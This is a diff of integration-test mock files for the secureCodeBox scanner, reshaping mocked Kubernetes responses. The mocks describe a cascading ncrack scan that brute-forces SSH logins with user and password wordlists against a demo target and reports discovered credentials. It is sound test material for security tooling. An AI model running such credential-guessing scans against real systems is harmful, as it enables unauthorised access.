"ncrack-dummy-ssh-d47zk-ncrack-ssh-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} + } + }, + "f:spec": { + "f:resources": {} + } + }, + "manager": "manager", + "operation": "Update", + "time": "2024-01-30T13:25:25Z" }, - "creationTimestamp": "2024-01-30T13:25:25Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "ncrack-dummy-ssh-d47zk-ncrack-ssh-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { - ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} - } + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:annotations": { + ".": {}, + "f:cascading.securecodebox.io/chain": {}, + "f:cascading.securecodebox.io/matched-finding": {}, + "f:cascading.securecodebox.io/parent-scan": {}, + "f:securecodebox.io/hook": {} }, - "f:spec": { - "f:resources": {} + "f:generateName": {}, + "f:ownerReferences": { + ".": {}, + "k:{\"uid\":\"09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3\"}": {} } }, - "manager": "manager", - "operation": "Update", - "time": "2024-01-30T13:25:25Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:annotations": { + "f:spec": { + ".": {}, + "f:cascades": { + ".": {}, + "f:inheritAffinity": {}, + "f:inheritAnnotations": {}, + "f:inheritEnv": {}, + "f:inheritHookSelector": {}, + "f:inheritInitContainers": {}, + "f:inheritLabels": {}, + "f:inheritTolerations": {}, + "f:inheritVolumes": {}, + "f:matchLabels": { ".": {}, - "f:cascading.securecodebox.io/chain": {}, - "f:cascading.securecodebox.io/matched-finding": {}, - "f:cascading.securecodebox.io/parent-scan": {}, - "f:securecodebox.io/hook": {} + "f:securecodebox.io/intensive": {}, + "f:securecodebox.io/invasive": {} }, - "f:generateName": {}, - "f:ownerReferences": { + "f:scopeLimiter": { ".": {}, - "k:{\"uid\":\"09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3\"}": {} + "f:validOnMissingRender": {} } }, - "f:spec": { - ".": {}, - "f:cascades": { + "f:hookSelector": {}, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {} + } + }, + "manager": "unknown", + "operation": "Update", + "time": "2024-01-30T13:25:25Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + "f:findings": { + "f:categories": { ".": {}, - "f:inheritAffinity": {}, - "f:inheritAnnotations": {}, - "f:inheritEnv": {}, - "f:inheritHookSelector": {}, - "f:inheritInitContainers": {}, - "f:inheritLabels": {}, - "f:inheritTolerations": {}, - "f:inheritVolumes": {}, - "f:matchLabels": { - ".": {}, - "f:securecodebox.io/intensive": {}, - "f:securecodebox.io/invasive": {} - }, - "f:scopeLimiter": { - ".": {}, - "f:validOnMissingRender": {} - } + "f:Discovered Credentials": {} }, - "f:hookSelector": {}, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {} - } - }, - "manager": "unknown", - "operation": "Update", - "time": "2024-01-30T13:25:25Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { - "f:findings": { - "f:categories": { - ".": {}, - "f:Discovered Credentials": {} - }, - "f:count": {}, - "f:severities": { - "f:high": {} - } + "f:count": {}, + "f:severities": { + "f:high": {} } } - }, - "manager": "unknown", - "operation": "Update", - "subresource": "status", - "time": "2024-01-30T13:25:41Z" + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "unknown", + "operation": "Update", + "subresource": "status", + "time": "2024-01-30T13:25:41Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { - ".": {}, - "f:severities": {} - }, - "f:orderedHookStatuses": {}, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-01-30T13:25:45Z" - } - ], - "name": "ncrack-dummy-ssh-d47zk-ncrack-ssh-9ht7b", - "namespace": "integration-tests", - "ownerReferences": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "blockOwnerDeletion": true, - "controller": true, - "kind": "Scan", - "name": "nmap-dummy-ssh-d47zk", - "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" - } - ], - "resourceVersion": "20705", - "uid": "c613dd44-626d-44a8-be36-8b71d984068c" - }, - "spec": { - "cascades": { - "inheritAffinity": true, - "inheritAnnotations": true, - "inheritEnv": false, - "inheritHookSelector": false, - "inheritInitContainers": false, - "inheritLabels": true, - "inheritTolerations": true, - "inheritVolumes": false, - "matchLabels": { - "securecodebox.io/intensive": "high", - "securecodebox.io/invasive": "invasive" + "f:severities": {} + }, + "f:orderedHookStatuses": {}, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } }, - "scopeLimiter": { - "validOnMissingRender": false - } + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-01-30T13:25:45Z" + } + ], + "name": "ncrack-dummy-ssh-d47zk-ncrack-ssh-9ht7b", + "namespace": "integration-tests", + "ownerReferences": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "blockOwnerDeletion": true, + "controller": true, + "kind": "Scan", + "name": "nmap-dummy-ssh-d47zk", + "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" + } + ], + "resourceVersion": "20705", + "uid": "c613dd44-626d-44a8-be36-8b71d984068c" + }, + "spec": { + "cascades": { + "inheritAffinity": true, + "inheritAnnotations": true, + "inheritEnv": false, + "inheritHookSelector": false, + "inheritInitContainers": false, + "inheritLabels": true, + "inheritTolerations": true, + "inheritVolumes": false, + "matchLabels": { + "securecodebox.io/intensive": "high", + "securecodebox.io/invasive": "invasive" }, - "hookSelector": {}, - "parameters": [ - "-v", - "-d10", - "-U", - "/ncrack/users.txt", - "-P", - "/ncrack/passwords.txt", - "-p", - "ssh:22", - "dummy-ssh.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "ncrack" + "scopeLimiter": { + "validOnMissingRender": false + } }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=39576bace58a75c3daba5097a26215a7b99ca62de62fb0e3066939c6ea4b17a2", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=eb1546645b611d5f8e43c696ab11a759c0b6257f046425f1747e639ee88c958e", - "findings": { - "categories": { - "Discovered Credentials": 1 - }, - "count": 1, - "severities": { - "high": 1 - } + "hookSelector": {}, + "parameters": [ + "-v", + "-d10", + "-U", + "/ncrack/users.txt", + "-P", + "/ncrack/passwords.txt", + "-p", + "ssh:22", + "dummy-ssh.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "ncrack" + }, + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=39576bace58a75c3daba5097a26215a7b99ca62de62fb0e3066939c6ea4b17a2", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=eb1546645b611d5f8e43c696ab11a759c0b6257f046425f1747e639ee88c958e", + "findings": { + "categories": { + "Discovered Credentials": 1 }, - "orderedHookStatuses": [ - [ - { - "hookName": "dssh-cascading-scans", - "jobName": "dssh-cascading-scans-ncrack-dummy-ssh-d47zk-ncrack-ssh-9h-nbfwd", - "priority": 0, - "state": "InProgress", - "type": "ReadOnly" - } - ] - ], - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=228bb75956d8b8b9365bfcb030ecf6a57aeeaeb153d985ce9d52eae5bc241ea6", - "rawResultFile": "ncrack-results.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=a5230e4c81b2315e8aa2339cb3efeb985cd33aed5de02f0e023f161aa98289ec", - "rawResultType": "ncrack-xml", - "state": "Done" - } + "count": 1, + "severities": { + "high": 1 + } + }, + "orderedHookStatuses": [ + [ + { + "hookName": "dssh-cascading-scans", + "jobName": "dssh-cascading-scans-ncrack-dummy-ssh-d47zk-ncrack-ssh-9h-nbfwd", + "priority": 0, + "state": "InProgress", + "type": "ReadOnly" + } + ] + ], + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=228bb75956d8b8b9365bfcb030ecf6a57aeeaeb153d985ce9d52eae5bc241ea6", + "rawResultFile": "ncrack-results.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=a5230e4c81b2315e8aa2339cb3efeb985cd33aed5de02f0e023f161aa98289ec", + "rawResultType": "ncrack-xml", + "state": "Done" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockCascadingScanStatusResponse_Errored.json b/tests/integration/__testFiles__/mockCascadingScanStatusResponse_Errored.json index 95152062fc..e7eb08ea41 100644 --- a/tests/integration/__testFiles__/mockCascadingScanStatusResponse_Errored.json +++ b/tests/integration/__testFiles__/mockCascadingScanStatusResponse_Errored.json @@ -1,215 +1,213 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "annotations": { - "cascading.securecodebox.io/chain": "ncrack-ssh", - "cascading.securecodebox.io/matched-finding": "ca358271-980b-4f9a-a1b1-92b64f1d2a44", - "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-d47zk", - "securecodebox.io/hook": "cascading-scans" + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "annotations": { + "cascading.securecodebox.io/chain": "ncrack-ssh", + "cascading.securecodebox.io/matched-finding": "ca358271-980b-4f9a-a1b1-92b64f1d2a44", + "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-d47zk", + "securecodebox.io/hook": "cascading-scans" + }, + "creationTimestamp": "2024-01-30T13:25:25Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "ncrack-dummy-ssh-d47zk-ncrack-ssh-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} + } + }, + "f:spec": { + "f:resources": {} + } + }, + "manager": "manager", + "operation": "Update", + "time": "2024-01-30T13:25:25Z" }, - "creationTimestamp": "2024-01-30T13:25:25Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "ncrack-dummy-ssh-d47zk-ncrack-ssh-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { - ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} - } + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:annotations": { + ".": {}, + "f:cascading.securecodebox.io/chain": {}, + "f:cascading.securecodebox.io/matched-finding": {}, + "f:cascading.securecodebox.io/parent-scan": {}, + "f:securecodebox.io/hook": {} }, - "f:spec": { - "f:resources": {} + "f:generateName": {}, + "f:ownerReferences": { + ".": {}, + "k:{\"uid\":\"09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3\"}": {} } }, - "manager": "manager", - "operation": "Update", - "time": "2024-01-30T13:25:25Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:annotations": { + "f:spec": { + ".": {}, + "f:cascades": { + ".": {}, + "f:inheritAffinity": {}, + "f:inheritAnnotations": {}, + "f:inheritEnv": {}, + "f:inheritHookSelector": {}, + "f:inheritInitContainers": {}, + "f:inheritLabels": {}, + "f:inheritTolerations": {}, + "f:inheritVolumes": {}, + "f:matchLabels": { ".": {}, - "f:cascading.securecodebox.io/chain": {}, - "f:cascading.securecodebox.io/matched-finding": {}, - "f:cascading.securecodebox.io/parent-scan": {}, - "f:securecodebox.io/hook": {} + "f:securecodebox.io/intensive": {}, + "f:securecodebox.io/invasive": {} }, - "f:generateName": {}, - "f:ownerReferences": { + "f:scopeLimiter": { ".": {}, - "k:{\"uid\":\"09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3\"}": {} + "f:validOnMissingRender": {} } }, - "f:spec": { - ".": {}, - "f:cascades": { + "f:hookSelector": {}, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {} + } + }, + "manager": "unknown", + "operation": "Update", + "time": "2024-01-30T13:25:25Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + "f:findings": { + "f:categories": { ".": {}, - "f:inheritAffinity": {}, - "f:inheritAnnotations": {}, - "f:inheritEnv": {}, - "f:inheritHookSelector": {}, - "f:inheritInitContainers": {}, - "f:inheritLabels": {}, - "f:inheritTolerations": {}, - "f:inheritVolumes": {}, - "f:matchLabels": { - ".": {}, - "f:securecodebox.io/intensive": {}, - "f:securecodebox.io/invasive": {} - }, - "f:scopeLimiter": { - ".": {}, - "f:validOnMissingRender": {} - } + "f:Discovered Credentials": {} }, - "f:hookSelector": {}, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {} - } - }, - "manager": "unknown", - "operation": "Update", - "time": "2024-01-30T13:25:25Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { - "f:findings": { - "f:categories": { - ".": {}, - "f:Discovered Credentials": {} - }, - "f:count": {}, - "f:severities": { - "f:high": {} - } + "f:count": {}, + "f:severities": { + "f:high": {} } } - }, - "manager": "unknown", - "operation": "Update", - "subresource": "status", - "time": "2024-01-30T13:25:41Z" + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "unknown", + "operation": "Update", + "subresource": "status", + "time": "2024-01-30T13:25:41Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { - ".": {}, - "f:severities": {} - }, - "f:orderedHookStatuses": {}, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-01-30T13:25:45Z" - } - ], - "name": "ncrack-dummy-ssh-d47zk-ncrack-ssh-9ht7b", - "namespace": "integration-tests", - "ownerReferences": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "blockOwnerDeletion": true, - "controller": true, - "kind": "Scan", - "name": "nmap-dummy-ssh-d47zk", - "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" - } - ], - "resourceVersion": "20705", - "uid": "c613dd44-626d-44a8-be36-8b71d984068c" - }, - "spec": { - "cascades": { - "inheritAffinity": true, - "inheritAnnotations": true, - "inheritEnv": false, - "inheritHookSelector": false, - "inheritInitContainers": false, - "inheritLabels": true, - "inheritTolerations": true, - "inheritVolumes": false, - "matchLabels": { - "securecodebox.io/intensive": "high", - "securecodebox.io/invasive": "invasive" + "f:severities": {} + }, + "f:orderedHookStatuses": {}, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } }, - "scopeLimiter": { - "validOnMissingRender": false - } + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-01-30T13:25:45Z" + } + ], + "name": "ncrack-dummy-ssh-d47zk-ncrack-ssh-9ht7b", + "namespace": "integration-tests", + "ownerReferences": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "blockOwnerDeletion": true, + "controller": true, + "kind": "Scan", + "name": "nmap-dummy-ssh-d47zk", + "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" + } + ], + "resourceVersion": "20705", + "uid": "c613dd44-626d-44a8-be36-8b71d984068c" + }, + "spec": { + "cascades": { + "inheritAffinity": true, + "inheritAnnotations": true, + "inheritEnv": false, + "inheritHookSelector": false, + "inheritInitContainers": false, + "inheritLabels": true, + "inheritTolerations": true, + "inheritVolumes": false, + "matchLabels": { + "securecodebox.io/intensive": "high", + "securecodebox.io/invasive": "invasive" }, - "hookSelector": {}, - "parameters": [ - "-v", - "-d10", - "-U", - "/ncrack/users.txt", - "-P", - "/ncrack/passwords.txt", - "-p", - "ssh:22", - "dummy-ssh.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "ncrack" + "scopeLimiter": { + "validOnMissingRender": false + } }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=39576bace58a75c3daba5097a26215a7b99ca62de62fb0e3066939c6ea4b17a2", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=eb1546645b611d5f8e43c696ab11a759c0b6257f046425f1747e639ee88c958e", - "findings": { - "categories": { - "Discovered Credentials": 1 - }, - "count": 1, - "severities": { - "high": 1 - } + "hookSelector": {}, + "parameters": [ + "-v", + "-d10", + "-U", + "/ncrack/users.txt", + "-P", + "/ncrack/passwords.txt", + "-p", + "ssh:22", + "dummy-ssh.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "ncrack" + }, + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=39576bace58a75c3daba5097a26215a7b99ca62de62fb0e3066939c6ea4b17a2", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=eb1546645b611d5f8e43c696ab11a759c0b6257f046425f1747e639ee88c958e", + "findings": { + "categories": { + "Discovered Credentials": 1 }, - "orderedHookStatuses": [ - [ - { - "hookName": "dssh-cascading-scans", - "jobName": "dssh-cascading-scans-ncrack-dummy-ssh-d47zk-ncrack-ssh-9h-nbfwd", - "priority": 0, - "state": "InProgress", - "type": "ReadOnly" - } - ] - ], - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=228bb75956d8b8b9365bfcb030ecf6a57aeeaeb153d985ce9d52eae5bc241ea6", - "rawResultFile": "ncrack-results.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=a5230e4c81b2315e8aa2339cb3efeb985cd33aed5de02f0e023f161aa98289ec", - "rawResultType": "ncrack-xml", - "state": "Errored", - "errorDescription": "Mocked Error" - } + "count": 1, + "severities": { + "high": 1 + } + }, + "orderedHookStatuses": [ + [ + { + "hookName": "dssh-cascading-scans", + "jobName": "dssh-cascading-scans-ncrack-dummy-ssh-d47zk-ncrack-ssh-9h-nbfwd", + "priority": 0, + "state": "InProgress", + "type": "ReadOnly" + } + ] + ], + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=228bb75956d8b8b9365bfcb030ecf6a57aeeaeb153d985ce9d52eae5bc241ea6", + "rawResultFile": "ncrack-results.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=a5230e4c81b2315e8aa2339cb3efeb985cd33aed5de02f0e023f161aa98289ec", + "rawResultType": "ncrack-xml", + "state": "Errored", + "errorDescription": "Mocked Error" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockListNamespacedJobResponse.json b/tests/integration/__testFiles__/mockListNamespacedJobResponse.json index 2e56030b7d..4aaa6e6075 100644 --- a/tests/integration/__testFiles__/mockListNamespacedJobResponse.json +++ b/tests/integration/__testFiles__/mockListNamespacedJobResponse.json @@ -1,13 +1,11 @@ { - "body": { - "apiVersion": "batch/v1", - "items": [], - "kind": "JobList", - "metadata": { - "_continue": "undefined", - "remainingItemCount": "undefined", - "resourceVersion": "6097", - "selfLink": "undefined" - } + "apiVersion": "batch/v1", + "items": [], + "kind": "JobList", + "metadata": { + "_continue": "undefined", + "remainingItemCount": "undefined", + "resourceVersion": "6097", + "selfLink": "undefined" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockListNamespacedPodResponse.json b/tests/integration/__testFiles__/mockListNamespacedPodResponse.json index 89f33ba2cb..53307cfa2b 100644 --- a/tests/integration/__testFiles__/mockListNamespacedPodResponse.json +++ b/tests/integration/__testFiles__/mockListNamespacedPodResponse.json @@ -1,37 +1,35 @@ { - "body": { - "items": [ - { - "metadata": { - "name": "pod-1", - "namespace": "default", - "labels": { - "job-name": "example-job" - } - }, - "spec": { - "containers": [ - { - "name": "container-1", - "image": "nginx:1.7.9", - "ports": [ - { - "containerPort": 80 - } - ] - } - ] - }, - "status": { - "phase": "Running", - "conditions": [ - { - "type": "Ready", - "status": "True" - } - ] + "items": [ + { + "metadata": { + "name": "pod-1", + "namespace": "default", + "labels": { + "job-name": "example-job" } + }, + "spec": { + "containers": [ + { + "name": "container-1", + "image": "nginx:1.7.9", + "ports": [ + { + "containerPort": 80 + } + ] + } + ] + }, + "status": { + "phase": "Running", + "conditions": [ + { + "type": "Ready", + "status": "True" + } + ] } - ] - } + } + ] } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockReadNamespacedPodLogResponse.json b/tests/integration/__testFiles__/mockReadNamespacedPodLogResponse.json index 9938392287..a9a837c4b4 100644 --- a/tests/integration/__testFiles__/mockReadNamespacedPodLogResponse.json +++ b/tests/integration/__testFiles__/mockReadNamespacedPodLogResponse.json @@ -1,6 +1 @@ -{ - "response": { - "status_code": 200, - "body": "u001b[39m\u001b[0m\n\u001b[31mHTTPConnectionPool(host='old-typo3.demo-targets.svc', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\": Failed to resolve 'old-typo3.demo-targets.svc' ([Errno -2] Name does not resolve)\"))\u001b[39m\n\u001b[31mHTTPConnectionPool(host='old-typo3.demo-targets.svc', port=80): Max retries exceeded with url: /fdhmndovji (Caused by NameResolutionError(\": Failed to resolve 'old-typo3.demo-targets.svc' ([Errno -2] Name does not resolve)\"))\u001b[39m\n\u001b[31m\n[x] It seems that Typo3 is not used on this domain\n\u001b[39m\n" - } -} \ No newline at end of file +"u001b[39m\u001b[0m\n\u001b[31mHTTPConnectionPool(host='old-typo3.demo-targets.svc', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\": Failed to resolve 'old-typo3.demo-targets.svc' ([Errno -2] Name does not resolve)\"))\u001b[39m\n\u001b[31mHTTPConnectionPool(host='old-typo3.demo-targets.svc', port=80): Max retries exceeded with url: /fdhmndovji (Caused by NameResolutionError(\": Failed to resolve 'old-typo3.demo-targets.svc' ([Errno -2] Name does not resolve)\"))\u001b[39m\n\u001b[31m\n[x] It seems that Typo3 is not used on this domain\n\u001b[39m\n" \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockScanCreationResponse.json b/tests/integration/__testFiles__/mockScanCreationResponse.json index 98c9f362c9..5c61591964 100644 --- a/tests/integration/__testFiles__/mockScanCreationResponse.json +++ b/tests/integration/__testFiles__/mockScanCreationResponse.json @@ -1,49 +1,47 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "creationTimestamp": "2024-01-16T14:40:59Z", - "generateName": "nmap-example-", - "generation": 1, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:generateName": {} - }, - "f:spec": { - ".": 